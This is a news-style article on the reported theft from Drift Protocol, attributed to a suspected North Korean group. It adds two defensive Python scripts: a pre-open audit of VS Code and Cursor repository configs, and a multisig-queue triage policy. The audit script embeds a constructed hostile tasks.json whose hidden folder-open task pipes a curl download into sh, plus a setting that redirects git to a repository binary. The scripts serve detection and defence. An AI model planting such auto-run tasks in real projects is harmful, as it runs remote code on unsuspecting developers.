New revelations have surfaced regarding the high-profile cyberattack on Drift Protocol, which led to an estimated $270 million in losses. According to an update from the protocol’s development team, a group with suspected ties to the North Korean state ran the scheme over roughly six months, pairing patient relationship-building with technical compromise of contributors’ devices and, ultimately, of the protocol’s multisig.
Preparation and infiltration: establishing trust within the ecosystem
The first contact reportedly occurred at a major cryptocurrency conference in the fall of 2025, where the attackers disguised themselves as representatives of a quantitative trading firm. Possessing both technical expertise and seemingly verifiable professional backgrounds, the group methodically earned the trust of the Drift network by demonstrating a detailed understanding of protocol operations.
Vulnerabilities exploited and attack mechanisms
The group expanded its involvement beginning in October, initiating direct contact with the Drift community via Telegram. Presenting trading strategies common to the DeFi sector, it established legitimacy among key stakeholders. Between December 2025 and January 2026, the attackers deposited more than $1 million of their own funds into the protocol, further cementing their presence. During this period, they maintained regular face-to-face interactions with core team members, building a rapport that would enable deeper access to the organization.
In February and March, the relationship between the attackers and Drift contributors strengthened as they met in person at various industry events around the world. These interactions further solidified an atmosphere of trust, which proved instrumental in facilitating the subsequent breach.
On the technical side, the investigation uncovered two principal attack vectors. One member of the group distributed a wallet application to the ecosystem through Apple’s TestFlight beta-distribution channel, which does not subject a build to the full App Store review a published app receives; delivered that way, the app passed as a legitimate tool and escaped the scrutiny that would otherwise have applied.
The second vector was the code editors VSCode and Cursor. As the security community had been pointing out since late 2025, both editors could be made to execute code when a victim merely opened a malicious file or folder, with no further interaction. Configuration shipped inside a repository is one such path: tasks that an editor starts automatically when a folder is opened are honoured unless the editor is treating that folder as untrusted, so a cloned project can carry its own payload.
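The practical check a contributor wants at this point is a way to look at a freshly cloned folder before the editor does. The script below is an added example written for this article; it is not Drift code and not part of VS Code or Cursor. It parses the `.vscode/` configuration a repository ships with (including the comments and trailing commas the editors tolerate) and flags tasks set to run on folder open, plus a partial, illustrative set of settings that point the editor at an executable of the repository's choosing. The hostile `tasks.json` and `settings.json` embedded at the bottom are constructed samples, not files from any real repository.

```python
"""Pre-open audit of a repository for VS Code / Cursor auto-execution hooks.

Added example (not Drift code, not part of either editor). Flags tasks that
start when the folder is opened and settings that redirect the editor to a
repository-controlled binary. Run on a clone before opening it, or in CI.
"""
import json
import sys
from pathlib import Path

# Settings whose value names a program the editor will run. Partial list for
# illustration only; VS Code's Workspace Trust treats these as restricted.
EXECUTABLE_SETTINGS = (
    "git.path",
    "python.defaultInterpreterPath",
    "terminal.integrated.profiles.",
    "php.validate.executablePath",
)


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments and trailing commas without touching string literals."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:          # keep escaped character verbatim
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):            # line comment: drop to end of line
            nl = text.find("\n", i)
            i = n if nl == -1 else nl
            continue
        elif text.startswith("/*", i):            # block comment
            end = text.find("*/", i + 2)
            i = n if end == -1 else end + 2
            continue
        elif c == ",":                            # trailing comma before } or ]
            j = i + 1
            while j < n and text[j] in " \t\r\n":
                j += 1
            if j < n and text[j] in "}]":
                i += 1
                continue
            out.append(c)
        else:
            out.append(c)
        i += 1
    return "".join(out)


def load_jsonc(text: str):
    return json.loads(strip_jsonc(text))


def audit_tasks(tasks: dict) -> list:
    """Flag tasks the editor starts automatically when the folder opens."""
    findings = []
    for task in tasks.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
            findings.append(f"tasks.json: task {task.get('label')!r} runs on folder open: {cmd}")
    return findings


def audit_settings(settings: dict) -> list:
    """Flag settings that point the editor at a repository-controlled binary."""
    return [f"settings.json: {k} set to {v!r}" for k, v in settings.items()
            if any(k.startswith(prefix) for prefix in EXECUTABLE_SETTINGS)]


def audit_folder(root: Path) -> list:
    """Audit <root>/.vscode; unparsable files are reported rather than silently skipped."""
    findings = []
    for name, check in (("tasks.json", audit_tasks), ("settings.json", audit_settings)):
        path = root / ".vscode" / name
        if path.is_file():
            try:
                findings.extend(check(load_jsonc(path.read_text(encoding="utf-8"))))
            except (json.JSONDecodeError, UnicodeDecodeError) as exc:
                findings.append(f"{name}: could not parse ({exc}); inspect by hand")
    return findings


# Constructed samples of a hostile .vscode/ pair (not from any real repository).
SAMPLE_TASKS = r'''{
    // looks like a harmless post-clone helper
    "version": "2.0.0",
    "tasks": [
        {
            "label": "setup",
            "type": "shell",
            "command": "sh",
            "args": ["-c", "curl -s http://127.0.0.1:8000/setup.sh | sh"],
            "presentation": { "reveal": "never" },
            "runOptions": { "runOn": "folderOpen" },
        },
        { "label": "test", "type": "shell", "command": "npm test" }
    ]
}'''
SAMPLE_SETTINGS = r'''{
    "editor.tabSize": 4,
    /* repository-local git wrapper the editor would call instead of the real one */
    "git.path": "${workspaceFolder}/.tools/git",
}'''


def demo() -> list:
    return audit_tasks(load_jsonc(SAMPLE_TASKS)) + audit_settings(load_jsonc(SAMPLE_SETTINGS))


if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    for line in (audit_folder(target) if target else demo()):
        print("WARNING", line)
```

Run it as `python audit_vscode.py /path/to/clone`; with no argument it audits the two constructed samples. The comment stripper is string-aware on purpose: a naive regex would treat the `//` inside the sample's URL as a comment and silently mangle the very task being inspected. The settings list is deliberately short and should be extended to whatever extensions the team actually runs; the editors' own Restricted Mode remains the primary control, and this script is a second look for the case where someone has turned it off.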
Through these footholds the group bypassed the protocol’s controls and obtained multisignature (multisig) privileges, the access needed to carry out the attack. The malicious transactions were prepared in advance and sat in the queue for over a week, a window in which they could have been reviewed, before being executed on April 1; the funds were then drained from the protocol within minutes.
Evidence increasingly points to the involvement of UNC4736, a group believed to operate on behalf of North Korea. Also tracked under the names AppleJeus and Citrine Sleet, this group has recently been linked to several similar cyberattacks targeting the cryptocurrency sector.
Further investigation found that the individuals appearing at conferences were likely not North Korean nationals. It is believed that advanced forged identities and professional networks are employed as proxies to infiltrate such organizations, making direct attribution more complex in these types of operations.
Drift’s team has called on other protocols in the sector to rigorously audit who, and which devices, can propose, approve and execute multisig transactions, and to harden those devices. The breach has renewed broader discussions on the limitations of multisig management as a security model in decentralized finance, highlighting the evolving sophistication of threat actors in the space.
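Part of the audit Drift is asking for can be made mechanical, and the week the malicious transactions spent queued is the detail worth designing against. The script below is an added illustration for this article, not Drift’s code and not any multisig program’s API: it applies a time-bounded approval policy to a pending queue, so that a proposal that has sat too long, whose approvals have aged out, or that touches an authority or large-withdrawal instruction is surfaced for a fresh human check before it can execute. The field names, thresholds and the sample queue are constructed assumptions for the example.

```python
"""Triage of a pending multisig queue under a time-bounded approval policy.

Added example (not Drift code, not a real multisig program's schema). An
approval counts only while it is younger than APPROVAL_TTL, so a transaction
staged long before execution cannot be fired on stale signatures.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Illustrative policy values, not Drift's or any vendor's defaults.
APPROVAL_TTL = timedelta(hours=72)    # approvals older than this no longer count
MAX_PENDING = timedelta(days=3)       # proposals queued longer than this are re-reviewed
LARGE_WITHDRAWAL = 1_000_000          # in the protocol's base units; illustrative
HIGH_RISK = {"set_authority", "add_member", "change_threshold", "upgrade_program"}


@dataclass(frozen=True)
class Proposal:
    proposal_id: str
    instruction: str        # on-chain instruction the proposal would execute (assumed field)
    amount: int             # transferred amount, 0 when not a transfer (assumed field)
    created_at: datetime
    approvals: dict         # signer -> time the approval was recorded (assumed field)


def live_approvals(p: Proposal, now: datetime) -> dict:
    """Approvals still within APPROVAL_TTL at time `now`."""
    return {s: t for s, t in p.approvals.items() if now - t <= APPROVAL_TTL}


def executable(p: Proposal, now: datetime, threshold: int) -> bool:
    """Under the time-bounded policy a proposal executes only on fresh approvals."""
    return len(live_approvals(p, now)) >= threshold


def triage(proposals, now: datetime, threshold: int) -> dict:
    """Return {proposal_id: [reasons]} for every proposal a human should re-check."""
    flagged = {}
    for p in proposals:
        reasons = []
        if p.instruction in HIGH_RISK:
            reasons.append(f"high-risk instruction {p.instruction}")
        if p.instruction == "withdraw" and p.amount >= LARGE_WITHDRAWAL:
            reasons.append(f"withdrawal of {p.amount} at or above review threshold")
        age = now - p.created_at
        if age > MAX_PENDING:
            reasons.append(f"queued for {age.days} days; re-confirm intent with every signer")
        stale = len(p.approvals) - len(live_approvals(p, now))
        if stale and len(p.approvals) >= threshold:
            reasons.append(f"{stale} of {len(p.approvals)} approvals expired; not executable without re-approval")
        if reasons:
            flagged[p.proposal_id] = reasons
    return flagged


# Constructed sample queue at a fixed review time (not real Drift data).
NOW = datetime(2026, 4, 1, 12, 0, tzinfo=timezone.utc)
THRESHOLD = 2
SAMPLE_QUEUE = [
    # staged nine days ago, fully approved back then, large withdrawal
    Proposal("A", "withdraw", 50_000_000, NOW - timedelta(days=9),
             {"signer-1": NOW - timedelta(days=8, hours=23),
              "signer-2": NOW - timedelta(days=8, hours=22)}),
    # recent, one approval so far, but changes who controls the vault
    Proposal("B", "set_authority", 0, NOW - timedelta(days=1),
             {"signer-1": NOW - timedelta(hours=20)}),
    # routine, fresh, fully approved
    Proposal("C", "update_oracle", 0, NOW - timedelta(hours=2),
             {"signer-1": NOW - timedelta(hours=1),
              "signer-2": NOW - timedelta(minutes=30)}),
]


def review() -> dict:
    return triage(SAMPLE_QUEUE, NOW, THRESHOLD)


if __name__ == "__main__":
    for pid, reasons in review().items():
        print(pid, "->", "; ".join(reasons))
    for p in SAMPLE_QUEUE:
        print(p.proposal_id, "executable now:", executable(p, NOW, THRESHOLD))
```

In the sample, proposal A is exactly the shape of the Drift transactions: fully approved, then left to sit. Under this policy it is no longer executable when the attacker comes back for it, and it is flagged three times over. Proposal C passes untouched, which is the point of keeping the thresholds narrow enough that routine operations do not drown the queue in warnings. Whether a given multisig program can enforce approval expiry on-chain varies; where it cannot, the same rule can run off-chain as a gate in front of the execute step.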